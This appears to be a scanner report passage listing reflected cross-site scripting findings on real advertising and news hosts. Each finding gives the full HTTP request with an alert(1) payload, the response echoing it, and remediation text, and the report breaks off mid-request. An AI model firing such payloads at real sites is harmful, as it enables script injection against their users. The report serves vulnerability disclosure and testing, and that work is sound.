GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=1f462<script>alert(1)</script>398a6a54a7c&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:22 GMT Date: Thu, 03 Feb 2011 16:08:22 GMT Connection: close Content-Length: 3587
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6daaf<script>alert(1)</script>1ad5ede9ace was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=6daaf<script>alert(1)</script>1ad5ede9ace&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:23 GMT Date: Thu, 03 Feb 2011 16:08:23 GMT Connection: close Content-Length: 3587
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71024'%3balert(1)//daafc6b74fc was submitted in the admeld_adprovider_id parameter. This input was echoed as 71024';alert(1)//daafc6b74fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=871024'%3balert(1)//daafc6b74fc&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:17 GMT; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 190 Date: Thu, 03 Feb 2011 18:54:17 GMT
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad9f'%3balert(1)//03ee31b5e06 was submitted in the admeld_callback parameter. This input was echoed as 9ad9f';alert(1)//03ee31b5e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9ad9f'%3balert(1)//03ee31b5e06 HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:28 GMT; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 190 Date: Thu, 03 Feb 2011 18:54:27 GMT
1.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://business-news.thestreet.com
Path:
/ocregister
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b12"><script>alert(1)</script>c8944471237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ocregister?b9b12"><script>alert(1)</script>c8944471237=1 HTTP/1.1 Host: business-news.thestreet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=0 Last-Modified: Thu, 03 Feb 2011 19:04:36 +0000 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie, Accept-Encoding ETag: "1296759876" Content-Type: text/html; charset=utf-8 Content-Length: 65305 X-Served-By: pmisccache01.dc.thestreet.com Date: Thu, 03 Feb 2011 19:04:38 GMT X-Varnish: 209384145 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- Date Created: 20110203 14:04:38 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <a href="/ocregister?b9b12"><script>alert(1)</script>c8944471237=1/story/10-terrible-financial-choices-in-music-history/10993786"> ...[SNIP]...
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693e2"%3balert(1)//dacff80c547 was submitted in the $ parameter. This input was echoed as 693e2";alert(1)//dacff80c547 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=693e2"%3balert(1)//dacff80c547&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:693e2";alert(1)//dacff80c547;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=131 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:53 GMT Connection: close Content-Length: 2524
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',693e2";alert(1)//dacff80c547';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,693e2";alert(1)//dacff80c547;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18d5"%3balert(1)//fb81859235a was submitted in the $ parameter. This input was echoed as a18d5";alert(1)//fb81859235a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:a18d5";alert(1)//fb81859235a;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=133 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:51 GMT Connection: close Content-Length: 2511
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a18d5";alert(1)//fb81859235a';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a18d5";alert(1)//fb81859235a;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6763'%3balert(1)//afd391d5acc was submitted in the $ parameter. This input was echoed as a6763';alert(1)//afd391d5acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=a6763'%3balert(1)//afd391d5acc&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:a6763';alert(1)//afd391d5acc;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=130 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:54 GMT Connection: close Content-Length: 2524
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a6763';alert(1)//afd391d5acc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a6763';alert(1)//afd391d5acc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0b32'%3balert(1)//539eff4924d was submitted in the $ parameter. This input was echoed as a0b32';alert(1)//539eff4924d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:a0b32';alert(1)//539eff4924d;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=133 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:51 GMT Connection: close Content-Length: 2511
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a0b32';alert(1)//539eff4924d';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a0b32';alert(1)//539eff4924d;z="+Math.random();}
1.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c7.zedo.com
Path:
/bar/v16-401/c5/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0a0'-alert(1)-'be3b67982cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?8e0a0'-alert(1)-'be3b67982cf=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 985 Content-Type: application/x-javascript Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=412 Expires: Thu, 03 Feb 2011 16:18:54 GMT Date: Thu, 03 Feb 2011 16:12:02 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38c1'%3balert(1)//9f2a1335fe8 was submitted in the q parameter. This input was echoed as c38c1';alert(1)//9f2a1335fe8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=133 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:51 GMT Connection: close Content-Length: 2508
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='c38c1';alert(1)//9f2a1335fe8';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=c38c1';alert(1)//9f2a1335fe8;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e516d"%3balert(1)//8a8f531ed29 was submitted in the q parameter. This input was echoed as e516d";alert(1)//8a8f531ed29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=133 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:51 GMT Connection: close Content-Length: 2508
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='e516d";alert(1)//8a8f531ed29';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=e516d";alert(1)//8a8f531ed29;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed98c"%3balert(1)//2c617412c80 was submitted in the q parameter. This input was echoed as ed98c";alert(1)//2c617412c80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=ed98c"%3balert(1)//2c617412c80&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 